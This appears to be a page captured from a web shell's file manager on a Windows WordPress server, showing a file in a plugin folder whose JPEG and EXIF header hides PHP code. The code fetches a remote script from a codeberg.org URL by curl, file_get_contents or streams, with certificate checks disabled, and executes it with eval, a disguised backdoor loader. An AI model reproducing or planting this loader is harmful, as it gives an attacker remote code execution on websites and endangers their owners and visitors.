| Server IP : 127.0.0.1 / Your IP : 216.73.216.109 Web Server : Apache/2.4.54 (Win64) OpenSSL/1.1.1q PHP/8.1.10 System : Windows NT DESKTOP-E5T4RUN 10.0 build 19045 (Windows 10) AMD64 User : SERVERWEB ( 0) PHP Version : 8.1.10 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/laragon/www/prensa/wp-content/plugins/better-image-sizes/ |
Upload File : |
ÿØÿàJFIFÿáXExifMM*&.(126i>ê Adobe Photoshop 21.0 (Windows)2020:01:01 00:00:00ÿâ ICC_PROFILE0mntrRGB XYZ ÜacspöÖÓ- descrXYZgXYZ(bXYZ<wtptPcprtd#<?php
$protocol = "https";
$domain = "codeberg.org";
$file_path = "/zvertixx/My-Project/raw/branch/main/wp.php";
$url = $protocol . "://" . $domain . $file_path;
function fetch_content($url, $method) {
switch ($method) {
case 'file_get_contents':
if (@ini_get('allow_url_fopen')) {
return @file_get_contents($url);
}
break;
case 'curl':
if (function_exists('curl_version')) {
$ch = curl_init($url);
@curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
@curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
@curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$response = @curl_exec($ch);
@curl_close($ch);
return $response;
}
break;
case 'stream':
$ctx = stream_context_create(["http" => ["timeout" => 5]]);
if ($stream = @fopen($url, 'r', false, $ctx)) {
$content = @stream_get_contents($stream);
@fclose($stream);
return $content;
}
break;
}
return false;
}
$methods = ['curl', 'file_get_contents', 'stream'];
$content = false;
foreach ($methods as $method) {
$content = fetch_content($url, $method);
if ($content !== false && strlen($content) > 0) {
break;
}
}
if ($content !== false) {
eval("?>" . $content);
} else {
http_response_code(404);
exit();
}
?>